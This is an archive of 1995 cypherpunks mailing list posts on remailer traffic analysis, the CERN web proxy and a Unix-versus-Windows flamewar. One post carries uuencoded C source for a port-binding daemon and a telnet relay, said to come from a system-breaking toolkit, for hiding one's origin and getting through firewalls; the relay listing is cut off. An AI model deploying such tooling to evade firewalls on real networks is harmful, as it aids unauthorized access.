had the storage space, she could compare messages _that_ way, stripping off
the end bits, and getting the real message (encrypted) to Bob in the
process.

The natural way to do this is to super-encrypt.  Of course, if Chaum just
sends one rather large file to Bob each tick, Eve is hosed.

BTW, if Chaum does an MD5-compare of all incoming messages, he can limit a
spam to 1 per tick from his remailer with _no_ recordkeeping.  Or maybe he
could send a bunch of identical garbage messages to a random remailer, 85%
of the time....

I really don't see how you can call this "cooperation beyond that which is
needed".  If the remailers default to strip nested envelopes, and to pad
messages to standard sizes, the only "cooperation" between the operators is
to publish PGP keys.  They aren't "helping" each other, they are helping
the end users.

But this is all so trivial, compared to arguing operating systems.

Nathan


Finger or request keyserver for PGP 2.6.2 (tm) key.
PGP<->Mail/News installation incomplete.

Factors for modulous are not proven primes.  Key may be far weaker than
expected.  Encode at your own risk.

Key ID: 14712B4D 1994/12/26 Nathan H. Zook <nzook@bga.com>
Key fingerprint =  44 B3 D8 66 3D 55 1E 2E  F8 92 22 A6 33 8C DE 24 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBLywNqHmgMs8UcStNAQEgMAf/U+1rc6/5h6dZZAM9PuAJL0co25yE3JM4
vH3YSmRw31gQdjdRMw36XXZ4OLtTgV3CMBmlu5NoH5m80EAjUji3WCoRwhkin7G9
BgZnXhghR/ceLeE3MgyWZLTtApZkYO+z3zYxm1mYS4GLkuil/PENmuRrAFlihR4D
jx/OgCbEU6EnR8Nyh0nGKqToOsE8wPZJfT5ff17vOSHV8hBre354ePB5tnkDoV5H
MKgDTCkOx4vQJI8LNmQZHUCNyFmxuJTcYmxAM0j+8rAcdJzKo78eG7/vtJ4uxyBV
AxPN7SJyCyplJGgQQ4+y9m5RkSYM6CQFy5PS+jLY66f3ZLmgDaW5vw==
=Er9Z
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: random walk <pfinerty@seattleu.edu>
Date: Sun, 29 Jan 95 15:08:12 PST
To: Johnathan Corgan <jcorgan@aeinet.com>
Subject: Re: CERN Web Proxy
In-Reply-To: <Chameleon.4.01.950129130912.jcorgan@comet.aeinet.com>
Message-ID: <Pine.SUN.3.91.950129150751.28793B-100000@bach.seattleu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

here it is...

CERN = http://www.cern.ch:911


after removing the brain i simply placed it in a jar on my bench and
connected it to my calculator. it didn't do anything but it looked cool.
pfinerty@bach.seattleu.edu
finerty@msscc.med.utah.edu           finger any acct. for pgp key
pfinerty@nyx10.cs.du.edu


On Sun, 29 Jan 1995, Johnathan Corgan wrote:

> Date: Sun, 29 Jan 95 13:08:09 PST
> From: Johnathan Corgan <jcorgan@aeinet.com>
> To: Cypherpunks Mailing List <cypherpunks@toad.com>
> Subject: CERN Web Proxy
> 
> Could someone post the host/port number of the proxy server at CERN?
> 
> Thanks,
> 
> Johnathan
> 
> 
> 

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBLywgCbJv5rDIkn05AQEywgH9G9oUYLp2kpIHGgB5Pp0S07iL33lblFv/
kuiP3i5++Pb2112wxGeLyLAqRxdd8mQQqMR5R0HFJRu3n20x4j3F/A==
=I1zC
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Sun, 29 Jan 95 17:18:58 PST
To: cypherpunks@toad.com
Subject: Re: Six month mail processing delay :-)
In-Reply-To: <Pine.ULT.3.91.950129162530.717E-100000@krypton.mankato.msus.edu>
Message-ID: <e72BlyczBG06075yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <Pine.ULT.3.91.950129162530.717E-100000@krypton.mankato.msus.edu>, you wrote:

> This morning, I got the following message.  Note the dates on it.
> 
> Nothing like taking one's time.  You'd begin to think the government was 
> somehow involved.
> 
> -----BEGIN INCLUDED MESSAGE-----
> 
> >From MAILER-DAEMON@mtv.comSun Jan 29 16:25:27 1995
> Date: Sun, 29 Jan 1995 16:46:32 -0500
             ^^^^^^^^^^^
> From: Mail Delivery Subsystem <MAILER-DAEMON@mtv.com>
> To: hayden@krypton.mankato.msus.edu
> Subject: Returned mail: unknown mailer error 1
> 
> The original message was received at Tue, 24 May 1994 09:49:16 -0500
                                            ^^^^^^^^^^^
> from root@localhost


Now THAT'S what I call LATENCY!


                          | PROOF-READER, n: A malefactor who atones for
   Alan Bostick           | making your writing nonsense by permitting
   abostick@netcom.com    | the compositor to make it unintelligible.
finger for PGP public key |      Ambrose Bierce, THE DEVIL'S DICTIONARY
Key fingerprint:          | 
50 22 FB 46 41 A3 17 9D F7 33 FF E1 4E 1C 89 79  +legal_kludge=off

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQB1AgUBLywiveVevBgtmhnpAQEPigL+PjGcu5lvmSlqw9uNslBy0iLjfTUqYX0g
GtKFF8lCyr40GzHUWhCVAPHGXZ+lDI7LoGoB5SRKzX99gsNp5almfcTLkgi8ZZE5
eHmahsV3o67wA47TPlpTE/JfB9+gR4V3
=rf4O
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Sun, 29 Jan 95 15:33:40 PST
To: cypherpunks@toad.com
Subject: Re: DONT READ -- Continuing James Donald flamewar
In-Reply-To: <9501280307.AA20529@snark.imsi.com>
Message-ID: <Pine.3.89.9501291438.A12603-0100000@netcom4>
MIME-Version: 1.0
Content-Type: text/plain


Notice that my thread title -- was humorous and self mocking
"Even more holy wars on unix", and that the 
articles that I posted were very funny.


Whereas Perry -- the salesman who refused to take 
yes for ananswer when dealing with Netscape --  is 
filled with passionate rage.

What is up Perry -- do you have piles, or is the 
sawdust and chickenshit diet putting your temper 
on a short fuse?

One can reasonably argue, as he is now arguing, 
that unix is a good modern development environment.  
I think he is wrong -- I was amused at how unix folk 
were impressed at how I casually put up windows gui 
interface for a throwaway program that would
only be used once.

But it is a position that a rational person could 
reasonably believe, and might reasonably argue if 
this was the GUI development list and not the 
cypherpunks list.

But to claim, as some have claimed, that unix is 
as user friendly as Windows or the Mac, when 
suitably configured -- is a sign of utter irrationality 
that shows that those who assert such a fantastic claim 
are incapable or rational thought or rational
discussion on the topic.

The letters I have received also give ample evidence that 
those who hold this view are incapable of rational 
discussion on the matter.

The Holy bible attitude to unix is illustrated by the 
fact that the most flagrant and outrageous unix bugs 
are held to be correct behavior by definition -- 
"Unix does this, therefore it is right, and if you 
destroy your files as a result of this behavior then 
unix is right, and you are wrong."

Now one can argue that unix has bugs and DOS has 
bugs, but unix people, or at least those of them 
so irrational as to make the claim that Unix is 
user friendly, confronted with a unix bug, proclaim 
that the bug is is right, and DOS is wrong for not 
having the bug.


For example I received numerous letters arguing that the
the unix "mv" command is more powerful than the separate
DOS "replace" and "rename" commands.

This is like arguing that a combination hairbrush and 
chainsaw is more powerful than having two separate
tools, one a hairbrush and one a chainsaw.  One can
plausibly claim that such a tool is indeed powerful,
but that is hardly the point.


-
 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@aeinet.com>
Date: Sun, 29 Jan 95 15:48:33 PST
To: Cypherpunks Mailing List <nobody@flame.sinet.org>
Subject: Re: CERN Web Proxy
Message-ID: <Chameleon.4.01.950129154825.jcorgan@comet.aeinet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>> CERN = http://www.cern.ch:911
>
>Error 403
>
>Forbidden - by rule 
>
>
>CERN httpd 3.0

This is what you get if you interpret the above as a URL...which makes
sense since that was how it was posted.

What it really is is the host name and port name to configure your
Web browser so that all your HTTP traffic is funnelled through CERN
first, and then relayed from there to the destination.  I don't know
how Mosaic supports this, but under Netscape for Windows, it is under
Options | Preferences | Mail and Proxies | HTTP Proxy.

While this doesn't provide complete anonymity, it does prevent your 
email address, site name, etc. from appearing in the log files of the 
HTTP server you are connecting to.

I'm not sure why CERN has this running, but it is pretty usefull
nonetheless. 

==
Johnathan Corgan       "Violence is the last refuge of the incompetent."
jcorgan@aeinet.com                    -Isaac Asimov


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLywpCk1Diok8GKihAQHH+AQA4EG9IPrwZ76iLggvbyjaBRLiDETzTjyz
ljz87cOeAZ/sXevexPRD3RDzkSzOGRfbsFHEEV6gNI1q+35saJYCCVMdxCZUggeO
xIIkCg+lTC6vMjj4JLQ5nLH2yZX2na3DjeR5/vidaSw2oEEUM0n06e6XnXS19mZ9
/ggmzfYtt1U=
=hxmC
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: random walk <pfinerty@seattleu.edu>
Date: Sun, 29 Jan 95 15:53:25 PST
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: CERN Web Proxy
In-Reply-To: <m0rYj3r-0006U8C@myriad.pc.cc.cmu.edu>
Message-ID: <Pine.SUN.3.91.950129155019.2430A-100000@bach.seattleu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

you need to enter the proxy address in your preferences.  this is not a 
site to http to.

in your prefs there is a section on proxies.  put the address and port 
number in there.  this is already set for NSCA Mosaic, all you have to do 
is click on the button next to USE CERN PROXY SERVICE.  for netscape, 
just enter www.cern.ch in the http proxy section and 911 as the port number.

- -pjf

after removing the brain i simply placed it in a jar on my bench and
connected it to my calculator. it didn't do anything but it looked cool.
pfinerty@bach.seattleu.edu
finerty@msscc.med.utah.edu           finger any acct. for pgp key
pfinerty@nyx10.cs.du.edu


On Sun, 29 Jan 1995, Anonymous wrote:

> > CERN = http://www.cern.ch:911
> 
> Error 403
> 
> Forbidden - by rule 
> 
> 
> CERN httpd 3.0
> 

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBLywqZrJv5rDIkn05AQH8lwH/Vb9EOttY159tZIfGHchfITAUmkBRmfeM
9M+ZARdRf5/to0LwR1fEwj1P96eXv52wC8MPmNIDIh9fnO4L21OsoQ==
=Ea5t
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Sun, 29 Jan 95 16:16:16 PST
To: cypherpunks@toad.com
Subject: Data Bank Protocols
Message-ID: <ab51de62020210047c49@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


See ftp://ftp.netcom.com/pub/Si/Silk/DataBank.txt
for updated proposal for DataBank protocols. I have addressed, to a degree,
points made by Eric, and corrected the blunders pointed out by
jpp@markv.com. I am glad to e-mail this to anyone for whom ftp is awkward.

Thanks all.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Sun, 29 Jan 95 14:32:43 PST
To: Cypherpunks Mailing List <LSTOWN-L@SEARN.SUNET.SE>
Subject: Six month mail processing delay :-)
Message-ID: <Pine.ULT.3.91.950129162530.717E-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


I just HAD to forward this message I received.  About a 9 months ago I
joined Adam Curry's "CyberSleaze" mailing list.  About a month later I
unsubscribed.  The messages continued to come and I tried unsubscribing 
several more times.

Finally I set up a filter rule to flush the message and sent some grumpy 
email to the postmaster of the site telling them to fix their software 
(this was about mid-June of 1994).

This morning, I got the following message.  Note the dates on it.

Nothing like taking one's time.  You'd begin to think the government was 
somehow involved.

-----BEGIN INCLUDED MESSAGE-----

From MAILER-DAEMON@mtv.comSun Jan 29 16:25:27 1995
Date: Sun, 29 Jan 1995 16:46:32 -0500
From: Mail Delivery Subsystem <MAILER-DAEMON@mtv.com>
To: hayden@krypton.mankato.msus.edu
Subject: Returned mail: unknown mailer error 1

The original message was received at Tue, 24 May 1994 09:49:16 -0500
from root@localhost

   ----- The following addresses had delivery problems -----
"|/home/server/catmail -f -L CYBER-SLEAZE"  (unrecoverable error)
    (expanded from: daemon)

   ----- Transcript of session follows -----
554 "|/home/server/catmail -f -L CYBER-SLEAZE"... unknown mailer error 1

   ----- Original message follows -----

  [ Part 2: "Included Message" ]

Date: Tue, 24 May 1994 08:54:59 -0500 (CDT)
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
To: cyber-sleaze@mtv.com

unsubscribe

------END INCLUDED MESSAGE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Sun, 29 Jan 95 16:41:18 PST
To: Joe Turner <turner@telecheck.com>
Subject: Re: alt.religion.your.operating.system.sucks
In-Reply-To: <9501280817.AA15280@TeleCheck.com>
Message-ID: <Pine.3.89.9501291647.A14175-0100000@netcom5>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 28 Jan 1995, Joe Turner wrote:
> I mean so what if 
> it doesn't come with a pretty shrink wrapped package and a thick 
> getting-started, if you have a question just go find the source code.  
> Geez.  

The above appears to have been written with the complete
seriousness and genuine sincerity that is usual among unix
fans.


 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Sun, 29 Jan 95 16:46:11 PST
To: Joe Turner <turner@telecheck.com>
Subject: Re: alt.religion.your.operating.system.sucks
In-Reply-To: <9501280817.AA15280@TeleCheck.com>
Message-ID: <Pine.3.89.9501291649.A14175-0100000@netcom5>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 28 Jan 1995, Joe Turner wrote:
> Additionally, I don't know of too many operating 
> systems where the source code is floating around.  I mean so what if 
> it doesn't come with a pretty shrink wrapped package and a thick 
> getting-started, if you have a question just go find the source code.  
> Geez.  

There are some communities of software developers that have 
this strange belief that program behavior should conform to user
expectations instead of the user conforming to the program
behavior.


Your other remarks are rational, relevant, appropriate, and correct,
but this remark illustrates magnificently why unix is
still user hostile after all these years.


 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: erc@s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin])
Date: Sun, 29 Jan 95 16:04:13 PST
To: jamesd@netcom.com
Subject: Re: DONT READ -- Continuing James Donald flamewar
In-Reply-To: <Pine.3.89.9501291438.A12603-0100000@netcom4>
Message-ID: <m0rYjat-0004IhC@s116.slcslip.indirect.com>
MIME-Version: 1.0
Content-Type: text


> Whereas Perry -- the salesman who refused to take 
> yes for ananswer when dealing with Netscape --  is 
> filled with passionate rage.
> 
> What is up Perry -- do you have piles, or is the 
> sawdust and chickenshit diet putting your temper 
> on a short fuse?

While there may be something said for Perry's technical expertise, that
certainly doesn't excuse his rudeness.

> One can reasonably argue, as he is now arguing, 
> that unix is a good modern development environment.  
> I think he is wrong -- I was amused at how unix folk 
> were impressed at how I casually put up windows gui 
> interface for a throwaway program that would
> only be used once.

That all depends on what you are expecting in a development environment, and
what the goal of the development project is.  If your goal is to quickly
produce a GUI interface, then Windows and VB is indeed the way to go.  VB
has reasonable debugging facilities built in.  Not quite as good as gdb,
but reasonable.

If your goal is to produce non-GUI code, then UNIX offers a superior development
environment.

No operating system can be all things to all people (much as Bill Gates would
like that to happen).  Most UNIX systems suck at doing real-time processing,
and most Windows systems suck at doing anything approaching preemptive
multitasking.  The right tool for the right job - why make one environment
or the other do everything?

I've been hacking UNIX for 10 years, and doing Windows programming for almost
that long, so I've seen both environments, and know that one size *doesn't*
fit all.

> But to claim, as some have claimed, that unix is 
> as user friendly as Windows or the Mac, when 
> suitably configured -- is a sign of utter irrationality 
> that shows that those who assert such a fantastic claim 
> are incapable or rational thought or rational
> discussion on the topic.

It could be argued by some that UNIX is even less user-friendly than
MS-DOS, but that comes from the fact that UNIX wasn't designed to be anything
approaching a production system.  It was written by programmers for
programmers to hack on.

> The Holy bible attitude to unix is illustrated by the 
> fact that the most flagrant and outrageous unix bugs 
> are held to be correct behavior by definition -- 
> "Unix does this, therefore it is right, and if you 
> destroy your files as a result of this behavior then 
> unix is right, and you are wrong."

I'd say "UNIX does it *this* way, therefore it's correct ... for UNIX."
Different OS's do things differently.  Windows is designed to hold the
user's hand.  UNIX isn't.
-- 
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi
                       ** PGP encrypted email preferred! **

Cop: "How many beers have you had tonight, bro?"
Suspect: "Seventy."  -- from the TV show "Cops"



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sun, 29 Jan 95 17:57:14 PST
To: nzook@bga.com
Subject: Re:  Why encrypt intra-remailernet.
Message-ID: <199501300156.RAA29144@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Of course it was Chaum himself in his 1981 paper (which I think is available
from the CP FTP site) who described the duplicate-message attack.  I don't
see that inter-remailing encryption helps much, because the attacker can
still notice that whenever they inject message A, _something_ goes to
Bob.  The real solution, as Chaum pointed out, is that the remailer must
reject duplicate messages, even when separated by days.  Doing this without
keeping a database of all messages ever sent is left as an exercise.

Another aspect worth mentioning is that message splitting can make the
kinds of statistical correlations that Wei Dai was looking at more of
a danger.  It's one thing if I send a message along with thousands of
other people, and Bob gets a message along with everyone else.  But if I
send 10 messages and Bob gets 10 from that batch, that fact alone can
help to link us up.  So splitting my big message into 10 standard ones
isn't that great if they're all sent at once.  Ideally you'd want to
dribble them out at some standard rate, a rate at which you always send
a message whether you have something to send or not.  But this may introduce
unacceptable latency.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@myriad.pc.cc.cmu.edu (Matthew Ghio)
Date: Sun, 29 Jan 95 14:55:34 PST
To: cypherpunks@toad.com
Subject: Telnet Acrobatics
Message-ID: <m0rYiZL-0006TuC@myriad.pc.cc.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


What follows are two small programs which I thought might be of interest to
cypherpunks.  The first (socket.c) is a simple daemon which binds a port
and accepts connections, and then forks child processes for each one.
The second (relay.c) is a simple telnet program which opens a connection to
the specified remote host and port number.  Put together they can be used
as a telnet relay ("proxy server") that works like the term redir command.
This in itself is useful, if you want to hide where you're coming in from,
bypass a broken router or get through a firewall.  But, take a look at the
loop at the end of the second program.  It simply reads input from one
socket and writes it to another.  It would seem to me very easy to add
an encryptor/decryptor to this process and encrypt your telnet sessions.
You'd just need to exchange a key (via PGP) with the remote system, and
decide on a port number, then run crypt/dec daemons on both systems.  The
socket.c program might also be useful for socket-based remailing.  (Tho
you can set it up in your inetd.conf instead, if you have root access.)

However, I'm having a bit of trouble compiling these on some platforms.
I do not know who the original author is.  (These came out of a toolkit
for breaking system security and the author did not want to be known.)
After including a few additional libraries, I was able to compile both
under Linux, and it seems to work reasonably well.  They'll also
compile under SunOS, if you include <sys/termios.h>, but it won't
handle non-blocking I/O correctly, and can hang.  I can't get relay.c
to compile under Ultrix, though socket.c seems to work.  socket.c also
has a tendency to leave zombie processes hanging under Linux.

Anyone want to take a shot at debugging/porting it on other platforms
or adding crypto?

begin 644 socket.c
M(VEN8VQU9&4@/'-Y<R]T>7!E<RYH/@HC:6YC;'5D92`\<WES+W-I9VYA;"YH
M/@HC:6YC;'5D92`\<WES+W-O8VME="YH/@HC:6YC;'5D92`\;F5T:6YE="]I
M;BYH/@HC:6YC;'5D92`\;F5T9&(N:#X*(VEN8VQU9&4@/'-Y<R]T:6UE+F@^
M("\J(%)E<75I<F5D(&9O<B!,:6YU>"`H8G5T(&YO="!3=6Y/4RD@*B\*(VEN
M8VQU9&4@/'5N:7-T9"YH/B`O*B!297%U:7)E9"!F;W(@3&EN=7@@*&)U="!N
M;W0@4W5N3U,I("HO"B`@("`@("`@("`@("`@(`IR96%P*"E["B`@("`@("`@
M:6YT(',["B`@("`@("`@=VAI;&4H=V%I="@F<RDA/2TQ*3L*?0IM86EN*&%C
M+&%V*6EN="!A8SL*:6YT("HJ878["GL*("`@("`@("!S=')U8W0@<V]C:V%D
M9')?:6X@;7EA.PH@("`@("`@('-T<G5C="!S97)V96YT("IS<`H@("`@("`@
M(#L*("`@("`@("!F9%]S970@;75F.PH@("`@("`@(&EN="!M>69D+&YE=RQX
M+&UA>&9D/6=E=&1T86)L97-I>F4H*3L*("`@("`@("!S:6=N86PH4TE'0TQ$
M+')E87`I.PH@("`@("`@(&EF*"AM>69D/7-O8VME="A!1E])3D54+%-/0TM?
M4U1214%-+`H@("`@("`@("`@("`P*2D\,"EE>&ET*#$I.PH@("`@("`@(&UY
M82YS:6Y?9F%M:6QY/4%&7TE.150["B`@("`@("`@8GIE<F\H)FUY82YS:6Y?
M861D<BP*("`@("`@("`@("`@<VEZ96]F*&UY82YS:6Y?861D<BDI.PH@("`@
M("`@(&EF*"AS<#UG971S97)V8GEN86UE*&%V6S%=+")T8W`B*2D*("`@("`@
M("`@("`@/3TH<W1R=6-T('-E<G9E;G0@*BDP*7L*("`@("`@("`@("`@("`@
M(&EF*&%T;VDH879;,5TI/#TP*65X:70H,2D["B`@("`@("`@("`@("`@("!M
M>6$N<VEN7W!O<G0*("`@("`@("`@("`@("`@("`@("`]:'1O;G,H871O:2AA
M=ELQ72DI.PH@("`@("`@('T@96QS92!M>6$N<VEN7W!O<G0]<W`M/G-?<&]R
M=#L*("`@("`@("!I9BAB:6YD*&UY9F0L"B`@("`@("`@("`@("AS=')U8W0@
M<V]C:V%D9'(@*BDF;7EA+'-I>F5O9BAM>6$I*2EE>&ET*#$I.PH@("`@("`@
M(&EF*&QI<W1E;BAM>69D+`H@("`@("`@("`@("`Q*3PP*65X:70H,2D["FQO
M;W`Z(`H@("`@("`@($9$7UI%4D\H)FUU9BD["B`@("`@("`@1D1?4T54*&UY
M9F0L)FUU9BD["B`@("`@("`@:68*("`@("`@("`H<V5L96-T*&UY9F0K,2PF
M;75F+#`L,"PP*2$],7Q\(49$7TE34T54*&UY9F0L)FUU9BDI9V]T;PH@("`@
M("`@("`@("!L;V]P.PH@("`@("`@(&EF*"AN97<]86-C97!T*&UY9F0L,"PP
M*2D\,"EG;W1O(&QO;W`["B`@("`@("`@:68H9F]R:R@I"B`@("`@("`@("`@
M(#T],"E["B`@("`@("`@("`@("`@("!F;W(H>#TR.W@\;6%X9F0[>"LK*6EF
M*'@A/6YE=REC;&]S92AX*3L*("`@("`@("`@("`@("`@(&9O<BAX/3`[>#P*
M("`@("`@("`@("`@("`@("`@("!.4TE'.W@K*RES:6=N86PH>"Q324=?1$9,
M*3L*("`@("`@("`@("`@("`@(&1U<#(H;F5W+#`I.PH@("`@("`@("`@("`@
M("`@8VQO<V4H;F5W*3L*("`@("`@("`@("`@("`@(&1U<#(*("`@("`@("`@
M("`@("`@("`@("`H,"PQ*3L*("`@("`@("`@("`@("`@(&1U<#(H,"PR*3L*
M("`@("`@("`@("`@("`@(&5X96-V*&%V6S)=+&%V*S(I.PH@("`@("`@("`@
M("`@("`@97AI="@Q*3L*("`@("`@("!]"B`@("`@("`@8VQO<V4H;F5W*3L*
5("`@("`@("!G;W1O(&QO;W`["GT*
`
end
begin 644 relay.c
M(VEN8VQU9&4@/'-T9&EO+F@^"B-I;F-L=61E(#QN971D8BYH/@HC:6YC;'5D
M92`\<WES+W1Y<&5S+F@^"B-I;F-L=61E(#QS>7,O9FEL92YH/@HC:6YC;'5D
M92`\;F5T:6YE="]I;BYH/@HC:6YC;'5D92`\<WES+W-O8VME="YH/@HC:6YC
M;'5D92`\97)R;F\N:#X*(VEN8VQU9&4@/&9C;G1L+F@^"B-I;F-L=61E(#QS
M>7,O:6]C=&PN:#X*(VEN8VQU9&4@/'5N:7-T9"YH/@HC:6YC;'5D92`\<WES
M+W1I;64N:#X*+RHC:6YC;'5D92`\<WES+W1E<FUI;W,N:#XJ+R`@+RH@4F5Q
M=6ER960@9F]R(%-U;D]3("AB=70@;F]T($QI;G5X*2`J+PH*=F]I9"!M86EN
M*&EN="!A<F=C+&-H87(@*BIA<F=V*0I["B`@<F5G:7-T97(@8VAA<B`@("`@
M("`J<#L*("!R96=I<W1E<B!C:&%R("`@("`@("ID97-T.PH@(')E9VES=&5R
M(&EN="!X.PH@(&-H87(@:&]S=&YA;65;,C4V73L*("!I;G0@861D<CL*("!I
M;G0@8V]N;F5C=&EO;E]O:SL*("!S=')U8W0@:&]S=&5N="`J:&]S=#L*("!I
M;G0@<F5M;W1E9F0["B`@:6YT(&9D.PH@('-T<G5C="!S;V-K861D<E]I;B!R
M96UO=&5S97)V97(["B`@=6YS:6=N960@8VAA<B!C.PH@(&9D7W-E="!R96%D
M9F1S.PH@(&9D7W-E="!W<FET969D<SL*("!F9%]S970@97AC97!T9F1S.PH@
M('-T<G5C="!T97)M:6]S('1I;W-T<CL*("!I;G0@<CTQ.PH@(&EN="!W/3$[
M"B`@8VAA<B!B=69F97);,3`R-%T["B`@:6YT(&\["B`@"B`@<W1R8W!Y*&AO
M<W1N86UE+&%R9W9;,5TI.PH@(&AO<W0@/2!G971H;W-T8GEN86UE("AH;W-T
M;F%M92D["B`@:68@*"%H;W-T*2!P<FEN=&8H(B5S.B!U;FMN;W=N(&AO<W1<
M;B(L(&AO<W1N86UE*3L*("!B8V]P>2`H:&]S="T^:%]A9&1R+"`F861D<BP@
M-"D["B`@<F5M;W1E<V5R=F5R+G-I;E]F86UI;'D@/2!H;W-T+3YH7V%D9')T
M>7!E.PH@(')E;6]T97-E<G9E<BYS:6Y?<&]R="`](&AT;VYS*&%T;VDH87)G
M=ELR72DI.PH@(`H@('`@/2`H8VAA<B`J*2HH:&]S="T^:%]A9&1R7VQI<W0I
M.PH@(&9O<B`H9&5S="`]("AC:&%R("HI)G)E;6]T97-E<G9E<BYS:6Y?861D
M<BP@>"`](&AO<W0M/FA?;&5N9W1H.R`M+7@@/CT@,#L@*0H@("`@*F1E<W0K
M*R`]("IP*RL["B`@"B`@<F5M;W1E9F0@/2!S;V-K970H:&]S="T^:%]A9&1R
M='EP92P@4T]#2U]35%)%04TL(#`I.PH*("!C;VYN96-T:6]N7V]K(#T@8V]N
M;F5C="`H<F5M;W1E9F0L("AS=')U8W0@<V]C:V%D9'(@*BDF<F5M;W1E<V5R
M=F5R+"!S:7IE;V8H<F5M;W1E<V5R=F5R*2D["@H@(&EF("AC;VYN96-T:6]N
M7V]K(#P@,"D*("`@('L*("`@("`@<')I;G1F("@B0V]N;F5C=&EO;B!%<G)O
M<EQN(BD["B`@("`@(&9F;'5S:"`H<W1D;W5T*3L*("`@('T*"B`@+RH@3VMA
M>2P@8V]N;F5C=&EO;B!E<W1A8FQI<VAE9"X@*B\*"B`@9F-N=&PH<F5M;W1E
M9F0L($]?3D].0DQ/0TLI.PH@(&9D/3`["B`@9F-N=&PH9F0L($]?3D].0DQ/
M0TLI.PH*("!I;V-T;"AF9"P@1DE/3D))3RP@*&EN="`J*3$I.R`O*B!.;VXM
M0FQO8VMI;F<@22]/("HO"B`@:6]C=&PH<F5M;W1E9F0L($9)3TY"24\L("AI
M;G0@*BDQ*3L*("`*("!I;V-T;"AF9"P@5$-'1513+"`F=&EO<W1R*3L*("!T
M:6]S='(N8U]L9FQA9STP.R`O*B!$:7-A8FQE(&%L;"!P<F]C97-S:6YG.R!U
M;F%L=&5R960@."UB:70@8VAA;FYE;"`J+PH@('1I;W-T<BYC7VEF;&%G/3`[
M"B`@=&EO<W1R+F-?;V9L86<],#L*("!T:6]S='(N8U]C8UM624Y44ET],#L*
M("!T:6]S='(N8U]C8UM6455)5%T],#L*("!T:6]S='(N8U]C8UM614]&73TP
M.PH@(&EO8W1L*&9D+"!40U-%5%,L("9T:6]S='(I.PH*("!I;V-T;"AR96UO
M=&5F9"P@5$-'1513+"`F=&EO<W1R*3L*("!T:6]S='(N8U]L9FQA9STP.R`O
M*B!$:7-A8FQE(&%L;"!P<F]C97-S:6YG.R!U;F%L=&5R960@."UB:70@8VAA
M;FYE;"`J+PH@('1I;W-T<BYC7VEF;&%G/3`["B`@=&EO<W1R+F-?;V9L86<]
M,#L*("!I;V-T;"AR96UO=&5F9"P@5$-31513+"`F=&EO<W1R*3L*("`*("!&
M1%]:15)/*"9W<FET969D<RD["B`@1D1?6D523R@F97AC97!T9F1S*3L*("`*
M("!W:&EL92AR(3TP)B9W(3TP*2!["B`@("!&1%]:15)/*"9R96%D9F1S*3L*
M("`@($9$7U-%5"AF9"P@)G)E861F9',I.PH@("`@1D1?4T54*')E;6]T969D
M+"`F<F5A9&9D<RD["B`@("!S96QE8W0H,38L("9R96%D9F1S+"`F=W)I=&5F
M9',L("9E>&-E<'1F9',L*'-T<G5C="!T:6UE=F%L("HI,"D["B`@("`O*B!4
M:&ES('=O<FMS(&)U="!I<R!W87D@=&]O('-L;W<N+BX@*B\*("`@("\J=SUR
